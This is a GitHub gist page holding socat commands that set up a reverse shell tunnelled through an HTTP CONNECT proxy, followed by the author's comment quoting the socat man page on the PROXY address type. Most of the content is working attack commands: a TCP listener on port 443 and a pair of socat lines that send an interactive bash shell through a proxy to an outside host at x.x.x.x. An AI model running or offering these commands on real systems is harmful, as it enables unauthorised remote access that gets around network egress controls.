Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
@staaldraad

This comment has been minimized.

Copy link
Owner Author

@staaldraad staaldraad commented Aug 31, 2018

The proxy server must allow CONNECT proxying

socat man-page entry:

PROXY:::
Connects to an HTTP proxy server on port 8080 using TCP/IP version 4 or 6 depending on address specification, name resolution, or option pf, and sends a CON‐
NECT request for hostname:port. If the proxy grants access and succeeds to connect to the target, data transfer between socat and the target can start. Note
that the traffic need not be HTTP but can be an arbitrary protocol.
Option groups: FD,SOCKET,IP4,IP6,TCP,HTTP,RETRY
Useful options: proxyport, ignorecr, proxyauth, resolve, crnl, bind, connect-timeout, mss, sourceport, retry
See also: SOCKS, TCP

Could probably do this in a one-liner but I was failing. The two part-er worked a charm 🎉

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.